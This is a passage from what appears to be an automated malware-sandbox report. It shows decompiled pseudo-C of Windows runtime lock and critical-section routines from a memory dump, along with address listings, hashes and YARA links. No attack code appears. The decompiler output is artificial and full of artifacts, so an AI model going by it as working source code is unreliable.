													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                  0x0233055a
                                                  0x0233055d
                                                  0x02330563
                                                  0x02330566
                                                  0x023305d8
                                                  0x023305e2
                                                  0x023305e5
                                                  0x00000000
                                                  0x023305e7
                                                  0x023305e7
                                                  0x023305ea
                                                  0x023305f3
                                                  0x023305f3
                                                  0x02330568
                                                  0x02330568
                                                  0x02330568
                                                  0x02330569
                                                  0x02330569
                                                  0x02330569
                                                  0x0233056b
                                                  0x00000000
                                                  0x00000000
                                                  0x0235217f
                                                  0x02352183
                                                  0x0235225b
                                                  0x0235225f
                                                  0x02352189
                                                  0x0235218c
                                                  0x0235218f
                                                  0x02352194
                                                  0x02352199
                                                  0x0235219d
                                                  0x023521a0
                                                  0x023521a2
                                                  0x023521ce
                                                  0x023521ce
                                                  0x023521ce
                                                  0x023521d0
                                                  0x023521d6
                                                  0x023521de
                                                  0x023521e2
                                                  0x023521e8
                                                  0x023521e9
                                                  0x023521ec
                                                  0x023521f1
                                                  0x023521f6
                                                  0x00000000
                                                  0x00000000
                                                  0x023521f8
                                                  0x023521fb
                                                  0x02352206
                                                  0x0235220b
                                                  0x0235220c
                                                  0x02352217
                                                  0x02352226
                                                  0x0235222b
                                                  0x0235222c
                                                  0x0235222f
                                                  0x02352232
                                                  0x02352235
                                                  0x02352235
                                                  0x0235223a
                                                  0x0235223f
                                                  0x02352241
                                                  0x02352243
                                                  0x02352248
                                                  0x02352248
                                                  0x0235224d
                                                  0x0235224f
                                                  0x02352262
                                                  0x02352263
                                                  0x02352268
                                                  0x02352269
                                                  0x02352269
                                                  0x02352269
                                                  0x0235226d
                                                  0x00000000
                                                  0x00000000
                                                  0x02352276
                                                  0x02352279
                                                  0x0235227e
                                                  0x02352283
                                                  0x02352287
                                                  0x0235228a
                                                  0x0235228d
                                                  0x0235228f
                                                  0x023522bc
                                                  0x023522bc
                                                  0x023522bc
                                                  0x023522be
                                                  0x023522c4
                                                  0x023522cc
                                                  0x023522d0
                                                  0x023522d6
                                                  0x023522d7
                                                  0x023522da
                                                  0x023522df
                                                  0x023522e4
                                                  0x00000000
                                                  0x00000000
                                                  0x023522e6
                                                  0x023522e9
                                                  0x023522f4
                                                  0x023522f9
                                                  0x023522fa
                                                  0x02352305
                                                  0x02352314
                                                  0x02352319
                                                  0x0235231a
                                                  0x0235231d
                                                  0x02352320
                                                  0x02352323
                                                  0x02352323
                                                  0x02352328
                                                  0x0235232d
                                                  0x0235232f
                                                  0x02352331
                                                  0x02352336
                                                  0x02352336
                                                  0x0235233b
                                                  0x0235233d
                                                  0x02352350
                                                  0x02352351
                                                  0x02352356
                                                  0x02352359
                                                  0x02352359
                                                  0x0235235b
                                                  0x0235235d
                                                  0x02315367
                                                  0x0231536b
                                                  0x02315372
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x02352363
                                                  0x02352363
                                                  0x02352369
                                                  0x0235236a
                                                  0x0235236c
                                                  0x02352371
                                                  0x02352373
                                                  0x00000000
                                                  0x02352379
                                                  0x02352379
                                                  0x0235237a
                                                  0x0235237f
                                                  0x0235237f
                                                  0x02352385
                                                  0x02352386
                                                  0x02352389
                                                  0x0235238e
                                                  0x02352390
                                                  0x02315378
                                                  0x0231537c
                                                  0x02352396
                                                  0x02352396
                                                  0x02352397
                                                  0x0235239c
                                                  0x023523a2
                                                  0x023523a3
                                                  0x023523a6
                                                  0x023523ab
                                                  0x023523ad
                                                  0x00000000
                                                  0x023523b3
                                                  0x023523b3
                                                  0x023523b4
                                                  0x023523b9
                                                  0x023523ba
                                                  0x023523ba
                                                  0x023523bc
                                                  0x023523bf
                                                  0x00000000
                                                  0x00000000
                                                  0x02349153
                                                  0x02349158
                                                  0x0234915a
                                                  0x0234915e
                                                  0x02349160
                                                  0x00000000
                                                  0x02349166
                                                  0x02349166
                                                  0x02349171
                                                  0x02349176
                                                  0x02349176
                                                  0x00000000
                                                  0x02349160
                                                  0x023523c6
                                                  0x023523ce
                                                  0x023523d7
                                                  0x023523d7
                                                  0x023523ad
                                                  0x02352390
                                                  0x02352373
                                                  0x0235233f
                                                  0x0235233f
                                                  0x00000000
                                                  0x0235233f
                                                  0x02352291
                                                  0x02352291
                                                  0x02352293
                                                  0x02352295
                                                  0x0235229a
                                                  0x023522a1
                                                  0x023522a3
                                                  0x023522a7
                                                  0x023522a9
                                                  0x00000000
                                                  0x00000000
                                                  0x023522ab
                                                  0x023522ad
                                                  0x023522af
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x023522af
                                                  0x023522b1
                                                  0x023522b4
                                                  0x023522b4
                                                  0x023522b6
                                                  0x023153be
                                                  0x023153be
                                                  0x023153be
                                                  0x023153c0
                                                  0x00000000
                                                  0x00000000
                                                  0x023153cb
                                                  0x023153ce
                                                  0x023153d0
                                                  0x023153d4
                                                  0x023153d6
                                                  0x00000000
                                                  0x023153d8
                                                  0x023153e3
                                                  0x023153ea
                                                  0x023153ea
                                                  0x00000000
                                                  0x023153d6
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x023522b6
                                                  0x00000000
                                                  0x0235228f
                                                  0x02352349
                                                  0x0235234d
                                                  0x02352251
                                                  0x02352251
                                                  0x00000000
                                                  0x02352251
                                                  0x023521a4
                                                  0x023521a4
                                                  0x023521a6
                                                  0x023521a8
                                                  0x023521ac
                                                  0x023521b6
                                                  0x023521b8
                                                  0x023521bc
                                                  0x023521be
                                                  0x00000000
                                                  0x00000000
                                                  0x023521c0
                                                  0x023521c2
                                                  0x023521c4
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x023521c4
                                                  0x023521c6
                                                  0x023521c6
                                                  0x023521c8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x023521c8
                                                  0x023521a2
                                                  0x00000000
                                                  0x02352183
                                                  0x0233057b
                                                  0x0233057d
                                                  0x02330581
                                                  0x02330583
                                                  0x02352178
                                                  0x00000000
                                                  0x02330589
                                                  0x0233058f
                                                  0x0233058f
                                                  0x02330583
                                                  0x00000000

                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02352206
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.666622449.00000000022E0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: true
                                                  • Associated: 00000007.00000002.666615943.00000000022D0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666691395.00000000023C0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666697417.00000000023D0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666703330.00000000023D4000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666708873.00000000023D7000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666713954.00000000023E0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666740002.0000000002440000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                  • API String ID: 885266447-4236105082
                                                  • Opcode ID: 201b90f1769bacba9ca4e0700586fb29cad3ec643a314eae77765e7afa2da6ad
                                                  • Instruction ID: 2a57b3f439bca921e285f7cbdb70df49ed905d294a651385765b0e8349244890
                                                  • Opcode Fuzzy Hash: 201b90f1769bacba9ca4e0700586fb29cad3ec643a314eae77765e7afa2da6ad
                                                  • Instruction Fuzzy Hash: C45128357003116FEB25CA58CC81FA773AAAF84720F258269FD59DB285DB71ED42CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 023314C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 64%
                                                  			E023314C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x23d2088; // 0x766f104e
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E02327707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E023313CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E02327707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E02327707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E022F2340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E022FE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                  0x023314c0
                                                  0x023314cb
                                                  0x023314d2
                                                  0x023314d6
                                                  0x023314da
                                                  0x023314de
                                                  0x023314e3
                                                  0x0233157a
                                                  0x0233157a
                                                  0x023314f1
                                                  0x023314f3
                                                  0x0235ea0f
                                                  0x00000000
                                                  0x0235ea15
                                                  0x00000000
                                                  0x0235ea15
                                                  0x023314f9
                                                  0x023314f9
                                                  0x023314fe
                                                  0x02331504
                                                  0x0235ea1a
                                                  0x0235ea1f
                                                  0x0235ea21
                                                  0x0235ea22
                                                  0x0235ea27
                                                  0x0235ea2a
                                                  0x0235ea2a
                                                  0x02331515
                                                  0x02331517
                                                  0x0233156d
                                                  0x02331572
                                                  0x02331575
                                                  0x02331575
                                                  0x0233151e
                                                  0x0235ea50
                                                  0x0235ea55
                                                  0x0235ea58
                                                  0x0235ea58
                                                  0x0233152e
                                                  0x02331531
                                                  0x02331533
                                                  0x00000000
                                                  0x02331535
                                                  0x02331541
                                                  0x02331549
                                                  0x02331549
                                                  0x02331533
                                                  0x023314f3
                                                  0x02331559

                                                  APIs
                                                  • ___swprintf_l.LIBCMT ref: 0235EA22
                                                    • Part of subcall function 023313CB: ___swprintf_l.LIBCMT ref: 0233146B
                                                    • Part of subcall function 023313CB: ___swprintf_l.LIBCMT ref: 02331490
                                                  • ___swprintf_l.LIBCMT ref: 0233156D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.666622449.00000000022E0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: true
                                                  • Associated: 00000007.00000002.666615943.00000000022D0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666691395.00000000023C0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666697417.00000000023D0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666703330.00000000023D4000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666708873.00000000023D7000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666713954.00000000023E0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666740002.0000000002440000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: %%%u$]:%u
                                                  • API String ID: 48624451-3050659472
                                                  • Opcode ID: b5e9ddabd675d4107a010c7a21d82718fd8091903cfc0a9b88a77ad096a880f3
                                                  • Instruction ID: cc2f209394c522cb672a4ccd1d58b44bead7b27d96d24ee60cbe591955c08fc8
                                                  • Opcode Fuzzy Hash: b5e9ddabd675d4107a010c7a21d82718fd8091903cfc0a9b88a77ad096a880f3
                                                  • Instruction Fuzzy Hash: 792195739002299BEB22DF68CC40AEBB3ADBB50714F444565FD8AD3144DB71EB588BD1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 023153A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 45%
                                                  			E023153A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x023d01c0;
									_push(_t92);
									_push(0);
									_t37 = E022EF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E02334FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E02343F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E02343F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0237217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02343F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E02333915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E02315384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E022EF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E02333915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E022EF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E02333915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E022EF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E02333915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E02315329(_t74, _t92);
													_push(1);
													_t48 = E023153A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                  0x023153ab
                                                  0x023153ae
                                                  0x023153b1
                                                  0x023153b4
                                                  0x023153b7
                                                  0x023305b6
                                                  0x023305c0
                                                  0x023305c3
                                                  0x00000000
                                                  0x023305c9
                                                  0x023305c9
                                                  0x023305cc
                                                  0x023305d5
                                                  0x023305d5
                                                  0x023153bd
                                                  0x023153bd
                                                  0x023153bd
                                                  0x023153be
                                                  0x023153be
                                                  0x023153be
                                                  0x023153c0
                                                  0x00000000
                                                  0x00000000
                                                  0x02352269
                                                  0x0235226d
                                                  0x02352349
                                                  0x0235234d
                                                  0x02352273
                                                  0x02352276
                                                  0x02352279
                                                  0x0235227e
                                                  0x02352283
                                                  0x02352287
                                                  0x0235228a
                                                  0x0235228d
                                                  0x0235228f
                                                  0x023522bc
                                                  0x023522bc
                                                  0x023522bc
                                                  0x023522be
                                                  0x023522c4
                                                  0x023522cc
                                                  0x023522d0
                                                  0x023522d6
                                                  0x023522d7
                                                  0x023522da
                                                  0x023522df
                                                  0x023522e4
                                                  0x00000000
                                                  0x00000000
                                                  0x023522e6
                                                  0x023522e9
                                                  0x023522f4
                                                  0x023522f9
                                                  0x023522fa
                                                  0x02352305
                                                  0x02352314
                                                  0x02352319
                                                  0x0235231a
                                                  0x0235231d
                                                  0x02352320
                                                  0x02352323
                                                  0x02352323
                                                  0x02352328
                                                  0x0235232d
                                                  0x0235232f
                                                  0x02352331
                                                  0x02352336
                                                  0x02352336
                                                  0x0235233b
                                                  0x0235233d
                                                  0x02352350
                                                  0x02352351
                                                  0x02352356
                                                  0x02352359
                                                  0x02352359
                                                  0x0235235b
                                                  0x0235235d
                                                  0x02315367
                                                  0x0231536b
                                                  0x02315372
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x02352363
                                                  0x02352363
                                                  0x02352369
                                                  0x0235236a
                                                  0x0235236c
                                                  0x02352371
                                                  0x02352373
                                                  0x00000000
                                                  0x02352379
                                                  0x02352379
                                                  0x0235237a
                                                  0x0235237f
                                                  0x0235237f
                                                  0x02352385
                                                  0x02352386
                                                  0x02352389
                                                  0x0235238e
                                                  0x02352390
                                                  0x02315378
                                                  0x0231537c
                                                  0x02352396
                                                  0x02352396
                                                  0x02352397
                                                  0x0235239c
                                                  0x023523a2
                                                  0x023523a3
                                                  0x023523a6
                                                  0x023523ab
                                                  0x023523ad
                                                  0x00000000
                                                  0x023523b3
                                                  0x023523b3
                                                  0x023523b4
                                                  0x023523b9
                                                  0x023523ba
                                                  0x023523ba
                                                  0x023523bc
                                                  0x023523bf
                                                  0x00000000
                                                  0x00000000
                                                  0x02349153
                                                  0x02349158
                                                  0x0234915a
                                                  0x0234915e
                                                  0x02349160
                                                  0x00000000
                                                  0x02349166
                                                  0x02349166
                                                  0x02349171
                                                  0x02349176
                                                  0x02349176
                                                  0x00000000
                                                  0x02349160
                                                  0x023523c6
                                                  0x023523cb
                                                  0x023523ce
                                                  0x023523d7
                                                  0x023523d7
                                                  0x023523ad
                                                  0x02352390
                                                  0x02352373
                                                  0x0235233f
                                                  0x0235233f
                                                  0x00000000
                                                  0x0235233f
                                                  0x02352291
                                                  0x02352291
                                                  0x02352293
                                                  0x02352295
                                                  0x0235229a
                                                  0x023522a1
                                                  0x023522a3
                                                  0x023522a7
                                                  0x023522a9
                                                  0x00000000
                                                  0x00000000
                                                  0x023522ab
                                                  0x023522ad
                                                  0x023522af
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x023522af
                                                  0x023522b1
                                                  0x023522b4
                                                  0x023522b4
                                                  0x023522b6
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x023522b6
                                                  0x0235228f
                                                  0x00000000
                                                  0x0235226d
                                                  0x023153cb
                                                  0x023153ce
                                                  0x023153d0
                                                  0x023153d4
                                                  0x023153d6
                                                  0x00000000
                                                  0x023153d8
                                                  0x023153e3
                                                  0x023153ea
                                                  0x023153ea
                                                  0x023153d6
                                                  0x00000000

                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023522F4
                                                  Strings
                                                  • RTL: Re-Waiting, xrefs: 02352328
                                                  • RTL: Resource at %p, xrefs: 0235230B
                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 023522FC
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.666622449.00000000022E0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: true
                                                  • Associated: 00000007.00000002.666615943.00000000022D0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666691395.00000000023C0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666697417.00000000023D0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666703330.00000000023D4000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666708873.00000000023D7000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666713954.00000000023E0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666740002.0000000002440000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                  • API String ID: 885266447-871070163
                                                  • Opcode ID: ae862ce03c7370e7c840bdccf4bcccb602a19155066503b8e19ab911e1b4e1a7
                                                  • Instruction ID: 51feb8606aef6abc9d717388f7e6cbdc91b3da13e502a136ca3c33fd72e811b9
                                                  • Opcode Fuzzy Hash: ae862ce03c7370e7c840bdccf4bcccb602a19155066503b8e19ab911e1b4e1a7
                                                  • Instruction Fuzzy Hash: 5C5106716117116BEF25DB68CC80FA773E9AF84324F104669FD49DB280EB71E941CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0231EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 51%
                                                  			E0231EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0230DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x23d793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E022F16C0(_t39);
				} else {
					_t40 = E022EF9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E02333915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E022F01A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x23d793c; // 0x0
								_push(_t85);
								_t44 = E022F1F28(_t71);
							} else {
								_t44 = E022EF8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E02333915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E02372306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0231EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E02334FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E02343F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E02343F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
